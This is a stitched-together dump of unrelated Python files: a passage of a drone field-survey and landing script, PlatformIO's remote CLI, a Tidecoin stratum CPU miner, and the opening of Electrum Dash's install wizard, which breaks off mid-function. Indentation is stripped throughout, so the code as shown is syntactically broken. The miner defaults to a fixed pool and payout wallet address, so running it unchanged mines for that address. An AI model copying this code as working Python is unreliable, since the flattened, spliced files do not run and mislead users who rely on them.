FIELD_LENGTH_Y = 2.65 #in meters
deltaX = 0.65 #in meters
deltaY = 0.25 #in meters
betweenX = 3
LANDING_B = 5
i, count = 0.1, 0
points = []
def getAdditionalPoints(coord1, coord2, parts, xyz=0):
'''
Создание дополнительных точек между двумя данными
'''
if xyz:
return zip(np.linspace(coord1[0], coord2[0], parts + 1), np.linspace(coord1[1], coord2[1], parts + 1), np.linspace(coord1[2], coord2[2], parts + 1))
return zip(np.linspace(coord1[0], coord2[0], parts + 1), np.linspace(coord1[1], coord2[1], parts + 1))
# Создание массива с точками для дальнейшего полета по полю (полет по зиг-загу)
while i <= FIELD_LENGTH_X:
j = 0.1
while j <= FIELD_LENGTH_Y:
if count % 2 == 0:
points.append((i, j))
else:
points.append((i, FIELD_LENGTH_Y-j))
j += deltaY
d = j - FIELD_LENGTH_Y
if d > 0: j -= d
if count % 2 == 0 and i != len(points) - 1:
points += list(getAdditionalPoints((i, j), (i + deltaX, j), betweenX))
elif count % 2 != 0 and i != len(points) - 1:
points += list(getAdditionalPoints((i, FIELD_LENGTH_Y - j), (i + deltaX, FIELD_LENGTH_Y-j), betweenX))
i += deltaX
count += 1
if points[-1][0] > FIELD_LENGTH_X:
points = points[:-3]
# взлет
takeoff(z)
navigate_wait(0.15, 0.15, 1.2)
# распознавание qr-кода
qrs = []
qr = 'seed'
zLower = 1.05
# полет вокруг qr-кода для улучшения распознавания
for (x_new, y_new) in [(0.12, 0.15), (0.18, 0.05), (0.20, 0.05), (0.23, 0.2), (0.2, 0.25), (0.15, 0.15)]:
navigate_wait(x_new, y_new, zLower)
qrs.append(rc.waitDataQR())
rospy.sleep(0.55)
if len(qrs) > 0:
qr = rc.most_frequent(qrs)
if qr == None:
qr = 'seed'
print(".....")
print(qr)
navigate_wait(0.15, 0.1, z)
# полет по полю
for point in points:
'''
if points.index(point) == int(len(points) // 4):
break
'''
navigate_wait(x=point[0], y=point[1], z=z, speed=0.4, yaw=3.14/2.0)
rospy.sleep(0.3)
rc.coordsFunc()
rospy.sleep(0.3)
print("739")
# for (x_new, y_new) in [(0.75*FIELD_LENGTH_X, 0.75*FIELD_LENGTH_Y), (0.75*FIELD_LENGTH_X, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, 0.75*FIELD_LENGTH_Y)]:
# navigate_wait(x_new, y_new, 2.1)
# rospy.sleep(1)
print(coordinates[circle_type_mapping[qr]])
# определение координат для посадки
if len(coordinates[circle_type_mapping[qr]]) == 0:
landCoordinate = (1, 1)
print("1, 1")
else:
landCoordinate = max(coordinates[circle_type_mapping[qr]], key=len).mean(axis=0) ###############################################################
print("landCoordinate", landCoordinate)
print("746")
# посадка
telem = get_telemetry_aruco()
for (x_new, y_new) in list(getAdditionalPoints((telem.x, telem.y), landCoordinate, 3)):
navigate_wait(x_new, y_new, z)
navigate_wait(landCoordinate[0], landCoordinate[1], z)
print("749")
print('WRITING CSV WITH COORDINATES')
print(coordinates)
# Создание csv файла с координатами
if not os.path.exists(os.environ['HOME']+"/L22_AERO_LOG"):
os.mkdir(os.environ['HOME']+"/L22_AERO_LOG")
import csv
# from time import time
with open(os.environ['HOME']+"/L22_AERO_LOG/" + 'L22_AERO_result.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["Sector", "Type", "x (cm)", "y (cm)"])
arr = []
for key in coordinates:
if key in ['water_land', 'seed_land', 'pastures_land']: continue
for j in range(len(coordinates[key])):
point = coordinates[key][j].mean(axis=0)
x = point[0]
y = point[1]
if x < FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
arr.append(['C', key, x*100, y*100])
elif x < FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
arr.append(['A', key, x*100, y*100])
elif x >= FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
arr.append(['D', key, x*100, y*100])
elif x >= FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
arr.append(['B', key, x*100, y*100])
arr.sort(key = lambda x: x[0])
writer.writerows(arr)
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['TIME:', str(time.time()), 'TIME:', str(time.time())])
print('CSV SAVED')
telem = get_telemetry_aruco()
last = None
Z_LAND = 0.85
landingPath = list(getAdditionalPoints((landCoordinate[0], landCoordinate[1], z), (landCoordinate[0], landCoordinate[1], Z_LAND), 3, xyz = 1))
print(landingPath)
j = 0
print("756")
markerType = circle_type_mapping[qr]
while j < len(landingPath):
print(i, j)
print(rc.circles)
circles_copy = list(rc.circles)
if len(circles_copy) > 0:
for i in range(len(circles_copy)):
if rc.distance((circles_copy[i].cx_map, circles_copy[i].cy_map), landCoordinate) <= 0.6 and circle_type_mapping[circles_copy[i].color] == markerType:
navigate_wait(circles_copy[i].cx_map, circles_copy[i].cy_map, landingPath[j][2], tolerance=0.15)
last = list(circles_copy)
break
else:
circles_copy = []
j += 1
if len(circles_copy) == 0:
if last == None:
navigate_wait(landCoordinate[0], landCoordinate[1], 1.5)
elif len(circles_copy) > 0:
navigate_wait(circles_copy[-1].cx_map, circles_copy[-1].cy_map, 1.5)
telem = get_telemetry_aruco()
print("777")
# LANDING SYSTEM
print("markerType_LANDING", markerType)
print("STAGE2")
time_st = time.time()
TIMEOUT_H = 2.85
landing_update_rate = rospy.Rate(3.7)
# OFFSET = [2, 2] # pixels
while (time.time() - time_st) < TIMEOUT_H:
markers = [i for i in rc.circles if circle_type_mapping[i.color] == markerType]
rc.circles = []
rc.result = []
print(markers)
if len(markers) > 0:
marker = markers[0]
x_b, y_b, z_b, _ = transform_xyz_yaw(
marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", "body", listener)
# nav_broadcaster.sendTransform(
# (x_b, y_b, z_b),
# tf.transformations.quaternion_from_euler(0, 0, 0),
# rospy.Time.now(),
# "landing_target",
# "body"
# )
rospy.sleep(0.087)
print(x_b, y_b, z_b)
set_position(x=x_b, y=y_b, z=-0.076, frame_id="body")
if abs(z_b) < 0.2:
break
landing_update_rate.sleep()
print("LANDDDDDDDDDDDDDDDD")
land()
# vr.stop()
rospy.sleep(1.5)
print("DISARM")
arming(False)
print('DONE')
|
remote.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
from os import getcwd
from os.path import isfile, join
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs
from platformio.commands.device import device_monitor as cmd_device_monitor
from platformio.compat import get_file_contents
from platformio.managers.core import pioplus_call
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(**kwargs):
pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
pioplus_call(sys.argv[1:])
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
def remote_update(only_check, dry_run):
pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option(
"--baud", "-b", type=int, default=9600, help="Set baud rate, default=9600"
)
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.pass_context
def device_monitor(ctx, **kwargs):
def _tx_target(sock_dir):
try:
pioplus_call(sys.argv[1:] + ["--sock", sock_dir])
except exception.ReturnErrorCode:
pass
sock_dir = mkdtemp(suffix="pioplus")
sock_file = join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
kwargs["port"] = get_file_contents(sock_file)
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
|
terminate_the_fuck.py | #A stratum compatible miniminer
#based in the documentation
#https://slushpool.com/help/#!/manual/stratum-protocol
#2017-2019 Martin Nadal https://martinnadal.eu
import socket
import json
import random
import traceback
import tdc_mine
import time
from multiprocessing import Process, Queue, cpu_count
bfh = bytes.fromhex
def hash_decode(x: str) -> bytes:
return bfh(x)[::-1]
def target_to_bits(target: int) -> int:
c = ("%066x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def bits_to_target(bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x20):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN - 3))
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
"""
return x.hex()
def miner_thread(xblockheader, difficult):
nonce = random.randint(0, 2 ** 32 - 1) # job.get('nonce')
nonce_and_hash = tdc_mine.miner_thread(xblockheader, difficult, nonce)
return nonce_and_hash
def worker(xblockheader, payload1, payload2, bdiff, sock, number):
try:
while 1:
z = miner_thread(xblockheader, bdiff)
sock.sendall(payload1 + z[:8] + payload2)
except BrokenPipeError:
print("Pipe broken")
def miner(address, host, port, cpu_count=cpu_count(), password='password'):
print("address:{}".format(address))
print("host:{} port:{}".format(host, port))
print("Count threads: {}".format(cpu_count))
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print("Socket connected")
sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": ["pytideminer-1.0.0"]}\n')
lines = sock.recv(1024).decode().split('\n')
response = json.loads(lines[0])
sub_details, extranonce1, extranonce2_size = response['result']
extranonce2 = '00' * extranonce2_size
sock.sendall(b'{"params": ["' + address.encode() + b'", "' + password.encode() + b'"], "id": 2, "method": "mining.authorize"}\n')
print("Mining authorize")
procs = []
count = cpu_count
print("Start mining")
new_time = time.time()
count_shares = 0
global_count_share = 0
global_count_success_share = 0
difficult = 0.5
timer_without_new_job = 0
while True:
response = sock.recv(2024).decode()
responses = [json.loads(res) for res in response.split('\n') if len(res.strip()) > 0]
for response in responses:
if response['id'] == 4 and not response['error']:
count_shares += 1
global_count_share += 1
global_count_success_share += 1
print(f"accepted: {global_count_success_share}/{global_count_share} ({round(global_count_success_share/global_count_share*100)}%) (yay!!!)")
elif response['id'] == 4 and response['error']:
global_count_share += 1
print("boooo", response['error'])
elif response['id'] == 2 and not response['error']:
print("Authorize successful!!!")
elif response['id'] == 2 and response['error']:
print("Authorize error!!!", response['error'])
# get rid of empty lines
elif response['method'] == 'mining.set_difficulty':
old_diff = difficult
difficult = response['params'][0]
bdiff = bytes(str(difficult), "UTF-8")
print("New stratum difficulty: ", difficult)
elif response['method'] == 'mining.notify':
job_id, prevhash, coinb1, coinb2, merkle_branch, \
version, nbits, ntime, clean_jobs = response['params']
d = ''
for h in merkle_branch:
d += h
merkleroot_1 = tdc_mine.sha256d_str(coinb1.encode('utf8'), extranonce1.encode('utf8'),
extranonce2.encode('utf8'), coinb2.encode('utf8'), d.encode('utf8'))
xblockheader0 = version + prevhash + merkleroot_1.decode('utf8') + ntime + nbits
print("Mining notify")
for proc in procs:
proc.terminate()
procs = []
timer_without_new_job = time.time()
old_time = new_time
new_time = time.time()
xnonce = "00000000"
xblockheader = (xblockheader0 + xnonce).encode('utf8')
payload1 = bytes(
'{"params": ["' + "address" + '", "' + job_id + '", "' + extranonce2 + '", "' + ntime + '", "',
"UTF-8")
payload2 = bytes('"], "id": 4, "method": "mining.submit"}\n', "UTF-8")
for number in range(count):
proc = Process(target=worker, args=(xblockheader, payload1, payload2, bdiff, sock, number + 1))
proc.daemon = True
procs.append(proc)
proc.start()
if count_shares:
hashrate = count_shares * (old_diff / 65536) * 2 ** 32 / (new_time-old_time)
print(f"Found {count_shares} shares in {round(new_time-old_time)} seconds at diff", old_diff)
print(f"Current Hashrate:", round(hashrate), "H/s")
print(f"Recommended diff:", round((count_shares*10/(new_time-old_time))*old_diff, 2))
old_diff = difficult
count_shares = 0
if timer_without_new_job - time.time() > 120:
raise
except KeyboardInterrupt:
for proc in procs:
proc.terminate()
sock.close()
except:
print(traceback.format_exc())
try:
for proc in procs:
proc.terminate()
except:
pass
try:
sock.close()
except:
pass
print("Connection refused, restart after 30 s")
time.sleep(30)
miner(address, host, port, cpu_count, password)
if __name__ == "__main__":
import argparse
import sys
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', default="pool.tidecoin.exchange:3032", help='mining server url (eg: pool.tidecoin.exchange:3032)')
parser.add_argument('-u', '--user', dest='username', default='TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw.default', help='username for mining server',
metavar="USERNAME")
parser.add_argument('-t', '--threads', dest='threads', default=cpu_count(), help='count threads',
metavar="USERNAME")
parser.add_argument('-p', '--password', dest='password', default='password', help='password',
metavar="USERNAME")
options = parser.parse_args(sys.argv[1:])
miner(options.username, options.url.split(":")[0], int(options.url.split(":")[1]), int(options.threads), options.password)
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_dash.wallet import Wallet, Abstract_Wallet
from electrum_dash.storage import WalletStorage
from electrum_dash.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_dash.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_dash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_dash.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Dash Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Dash Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(4, 4, self.size-8, self.size-8)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 8, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Dash Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum-dash.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Dash Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Dash Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
